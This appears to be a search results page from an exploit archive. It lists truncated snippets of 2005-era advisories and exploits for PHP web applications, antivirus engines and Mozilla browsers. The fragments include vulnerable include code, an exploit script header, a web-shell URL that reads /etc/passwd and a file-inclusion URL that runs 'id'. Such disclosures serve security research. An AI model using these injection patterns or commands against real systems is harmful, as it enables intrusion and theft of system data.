1370 matches found
phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit
Exploit for unknown platform in category web applications ================================================================ phpWebSite arbitrary local inclusion, works with magic_quotes_gpc = Off\r\n"; echo "by rgod, mail: email protected\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; if...
phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit
No description provided by source. #!/usr/bin/php -q -d short_open_tag=on <? echo "PHPWebSite <= 0.10.2 remote cmmnds xctn\r\n"; echo "- arbitrary local inclusion, works with magic_quotes_gpc = Off\r\n"; echo "by rgod, mail: [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; i...
[Overflow.pl] Clam AntiVirus Win32-UPX Heap Overflow (not default configuration)
Overflow.pl Security Advisory 5 Clam AntiVirus Win32-UPX Heap Overflow not default configuration Vendor: Clam AntiVirus Affected version: Prior to 0.88.1 Vendor status: Fixed version released 0.88.1 Author: Damian Put [email protected] URL: http://www.overflow.pl/adv/clamavupxinteger.txt Date:...
phpkit_161r2_incl_xpl.txt
---------- PHPKit = v.1.6.1 release 2 remote code execution ------------------- software: site: www.phpkit.de description: a Content Management / homepage / community building software written in PHP language --------------------------------------------------------------------------------...
DocMGR <= 0.54.2 arbitrary remote inclusion
--------------- DocMGR <= 0.54.2 arbitrary remote inclusion -------------------- software: site: http://www.docmgr.org/ description: "DocMGR is a complete, web-based Document Management System DMS. It allows for the storage of any file type, and supports full-text indexing of the most popular...
EGS Enterprise Groupware System 1.0 rc4 remote commands execution & FlySpray 0.9.7 remote commands execution
--------EGS Enterprise Groupware System 1.0 rc4 possibly prior versions------- remote code execution -------------------------------------------------------------------------------- software: site: http://egs.sourceforge.net/ description: "EGS is an Open Source business system released under the...
linpha_10_local.txt
------------- Linpha = 1.0 multiple arbitrary local inclusion ----------------- software: site: http://linpha.sourceforge.net/nuke/ description: " LinPHA is an easy to use, multilingual, flexible photo / image archive / album / gallery written in PHP. It uses a SQL database to store information...
[Full-disclosure] Symantec Antivirus Library Remote Heap Overflows
Date December 20, 2005 Vulnerability The Symantec Antivirus Library provides file format support for virus analysis. During decompression of RAR files Symantec is vulnerable to multiple heap overflows allowing attackers complete control of the systems being protected. These vulnerabilities can be...
sugar_suite_40beta.txt
SugarSuite Open Source "; fclose$fp; ? note: the file can have any extension, but not .php or any executable, it must be readable from a browser... now you can launch commands on target system: http://target/pathtosugar/suntzu.php?cmd=cat%20/etc/passwd this is my proof of concept exploit tool: ?p...
SimpleBBS <= v1.1 remote commands execution in c by: unitedasia security crew
SugarSuite Open Source <= 4.0beta Remote code execution software: site: http://www.sugarcrm.com/crm/ i vulnerable code in acceptDecline.php at lines 81-82 ... $bean = $beanList[$_REQUEST['module']]; require_once($beanFiles[$bean]); ... if register_globals on & allow_url_fopen on in php.ini, remote code...
SugarSuite Open Source <= 4.0beta Remote code execution
SugarSuite Open Source <= 4.0beta Remote code execution software: site: http://www.sugarcrm.com/crm/ i vulnerable code in acceptDecline.php at lines 81-82 ... $bean = $beanList[$_REQUEST['module']]; require_once($beanFiles[$bean]); ... if register_globals on & allow_url_fopen on in php.ini, remote code...
atutor151pl2.txt
ATutor 1.5.1pl2 SQL Injection / Remote commands execution software: site: http://www.atutor.ca/ description : "ATutor is an Open Source Web-based Learning Content Management System LCMS designed with accessibility and adaptability in mind." if magic_quotes_gpc off - SQL INJECTION vulnerable code in...
wagora420_xpl.txt
W-agora 4.2.0 Remote code execution / cross site scripting poc exploit software: site: http://w-agora.net/en/index.php description: "W-Agora is a web publishing and forum software. It allows you and your visitors to store and display messages, files, share discussions and other information on you...
mylittle15_16b.txt
My Little Forum 1.5 / 1.6beta SQL Injection software: site: http://www.mylittlehomepage.net/mylittleforum software: "A simple web-forum that supports classical thread view message tree as well as messageboard view to display the messages. Requires PHP 4.1 and a MySQL database." 1 look at the...
Mozilla Browsers 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (v2)
No description provided by source. HTMLSCRIPT / SSSSSSS, SSSSSSS' PwnZilla 5 - One sploit fits all. FireFox optimized iSY iS; .sS Exploit for IDN host name heap buffer overrun in .SSSSSSS .sS Mozilla browsers FireFox, Mozilla and Netscape iS; .sS Copyright C 2003-2005 by Berend-Jan Wever. .SS...
Remote File Inclusion in MyGuestbook
Remote File Inclusion in MyGuestbook Date: 10/07/2005 Severity: High version: 0.6.1 The bug resides in form.inc.php3 The Vulnerable Code if $show 1 include "form.inc.php3"; Exploit : http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id Discovery by RoDheDoR L-G-H Team http://www.lezr.com Best...
PaFileDB31SQL.txt
SePro Advisory 5 PaFileDB 3.1 - SQL-Injection =========================================================== Vendor: PhpArena URL: http://www.phparena.net/ Date: 17.08.05 App.: PaFileDB Version: 3.1 Type: SQL-Injection Risc: High Credits: ================================ Newangels &...
PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities
-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHPTB Topic Board - Multiple PHP injection vulnerabilities Version = 2.0 Homepage: htt://www.phptb.com/ Author: Filip Groszyński VXSfx Date: 17 August 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Background: PHPTB Top...
phptbInject.txt
-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHPTB Topic Board - Multiple PHP injection vulnerabilities Version = 2.0 Homepage: htt://www.phptb.com/ Author: Filip Groszyński VXSfx Date: 17 August 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Background: PHPTB Top...
[SVadvisory#13] - SQL injection in MYFAQ 1.0
SVadvisory13 title: SQL injection product: MYFAQ version: V1.0 site: http://vpontier.free.fr/ ===================================================================================== Vulnerability ============== 1 affichagefaq.php3 Code: -------------------------- ?php .... $Requete = "SELECT LIBELL...